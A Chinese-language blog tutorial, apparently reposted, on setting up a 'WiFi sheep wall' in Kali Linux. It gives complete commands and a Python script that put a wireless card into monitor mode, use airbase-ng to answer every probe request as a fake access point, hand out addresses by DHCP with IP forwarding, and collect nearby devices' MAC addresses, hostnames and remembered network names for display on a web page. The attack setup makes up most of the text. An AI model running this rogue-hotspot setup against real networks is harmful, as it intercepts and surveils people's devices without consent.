Kali linux搭建wifi绵羊墙
来源:互联网 发布:花形透 知乎 编辑:程序博客网 时间:2024/05/16 05:22
本篇文章是在前人的基础上完成的,之前查了几篇wifi绵羊墙的搭建,但是参照任何一篇搭建出来都或多或少的存在一些问题,可能是我Kali系统跟别人的不一样。探索了大概一个礼拜的时间,实现了嗅探获取周围环境中的MAC及连过的SSID、主机名,图片嗅探等。本篇先介绍以下Kali系统中绵羊墙的搭建,本篇是在一个新装的Kali系统中实验的,边实验边截图边写。
实验环境
操作系统:连着网线的笔记本,笔记本在VMware中安装Kali系统,Kali版本kali-linux-2017.1-i386.iso
Kali系统下载链接:https://www.kali.org/downloads/
无线网卡:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)
安装配置
1.kali自带aircrack-ng,需要安装isc-dhcp-server、iptables
apt-get install isc-dhcp-server apt-get install iptables
2.配置文件
首先gedit /etc/dhcp/dhcpd.conf 打开dhcpd.conf文件,将以下内容添加进去:
authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-mask 255.255.255.0;option domain-name-servers 10.0.0.1;range 10.0.0.10 10.0.0.100;}
这里以10.0.0.1作为网关和dns服务器地址
然后gedit /etc/default/isc-dhcp-server,打开isc-dhcp-server文件,将
INTERFACESv4=""INTERFACESv6=""
改为
INTERFACESv4="at0"INTERFACESv6="at0"
3.处理无线网卡
用ifconfig命令看一下无线网卡的名称
//将无线网卡启动起来:ifconfig wlan0 up//杀死其余影响进程:airmon-ng check kill//将无线网卡设置为监听模式:airmon-ng start wlan0
这里wlan0mon为映射的网络接口
wifi嗅探
1.软件虚拟AP,伪造虚假响应包(Probe Response)来回应STA(Wireless station,手机、平板等客户端等)的探测(Probe Request),并把结果保存到nohup.out中
airbase-ng -P -C 30 -v wlan0mon | tee nohup.out
这里
-P : respond to all probes, even when specifying ESSIDs
-C seconds : enables beaconing of probed ESSID values (requires -P)
2.热点的网络流量会被虚拟到at0这块网卡上面:
ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0 #分配IP和掩码route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #增加路由项,统一由10.0.0.1(at0)来传输数据。
打开ip地址转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
3.开启dhcp服务:
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-eth0.pid at0service isc-dhcp-server start
注:这里别人用的是
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0service isc-dhcp-server start
我的系统里没有dhcpd.pid,只有dhclient-eth0.pid,所以我用的dhclient-eth0.pid
搭建绵羊墙
1.运行python show.py脚本,生成两个文件Host.json和Mac.json可查看STA的的主机名、mac以及曾经连过的wifi
show.py的代码为:
import SimpleHTTPServerimport SocketServerimport threadingimport osimport jsonfrom time import sleepclass back(threading.Thread): def __init__(self): threading.Thread.__init__(self) def cmd(self,c): c=os.popen(c).read() return c def run(self): while True: cmd_=self.cmd("cat ../nohup.out |grep -|awk -F 'from ' '{print$2}'|sort |uniq ").replace('"','').split('\n') nohup='' x=0 for i in cmd_: j=' "%d":"%s",' %(x,i) nohup+= j x+=1 nohup='{%s}'%nohup[:len(nohup)-1] cmd_h=self.cmd("cat /var/lib/dhcp/dhcpd.leases|grep host|awk '{print$2}' ").replace('"','').split('\n') x=0 dhcp='' for i in cmd_h: j=' "%d":"%s",' %(x,i) dhcp+= j x+=1 dhcp='{%s}'%dhcp[:len(dhcp)-1] open('Host.json','w').write(dhcp) open('Mac.json','w').write(nohup) print dhcp,nohup print "reading .." sleep(30)back().start()PORT = 8009Handler = SimpleHTTPServer.SimpleHTTPRequestHandlerhttpd = SocketServer.TCPServer(("", PORT), Handler)print "serving at port", PORThttpd.serve_forever()
2.绵羊墙界面显示
界面显示的代码这里就不贴了,看一下效果吧
运行完一次后,写成脚本,每次在终端运行以下命令即可
bash wifi11.shpython show.py
其中wifi11.sh的代码为
ifconfig wlan0 upairmon-ng check killairmon-ng start wlan0airbase-ng -P -C 30 -v wlan0mon | tee nohup.out
show.py的代码上边已经给出了
PS:感谢实验过程中Root_Yang的帮助,实验的成功多亏了Root_Yang提供的资料与指导。
参考资料:
http://blog.csdn.net/Root__Yang/article/details/53106865
http://www.freebuf.com/articles/wireless/69840.html
- Kali linux搭建wifi绵羊墙
- wifi绵羊墙搭建
- Kali linux搭建钓鱼wifi
- kali下搭建WiFi钓鱼热点
- Kali Linux安装360免费wifi驱动。
- Kali Linux中前十名的Wifi攻击工具
- Kali Linux中前十名的Wifi攻击工具
- virtualbox kali linux 安装小米随身wifi
- Kali linux创建钓鱼wifi热点
- Kali Linux中前十名的Wifi攻击工具
- Kali Linux 暴力破解 wifi密码
- 用Kali Linux获取Wifi密码
- Kali Wifi
- 搭建Kali Linux 基础环境
- linux -- 搭建wifi热点
- 搭建Web版Kali Linux渗透系统
- 在kali Linux中搭建DVWA
- 最新版Kali Linux上搭建DVWA
- 关于STM32标准外设库中的 USE_STDPERIPH_DRIVER, STM32F10X_MD
- Scales(dfs背包+剪枝)
- ARM学习笔记四
- MySQL 使用set names 解决乱码问题的原理
- 码农不识贝叶斯,虽知数据也枉然
- Kali linux搭建wifi绵羊墙
- Redis的常用方法总结
- 51nod 1607-卷积和(数位DP)
- Linux下33个常用的Find实例
- oracle连表查询
- Spring 基于注解的IOC配置&整合Junit
- Dubbo与Zookeeper、SpringMVC整合和使用(负载均衡、容错)
- JavaScript版正则表达式组合和限制字符
- SCU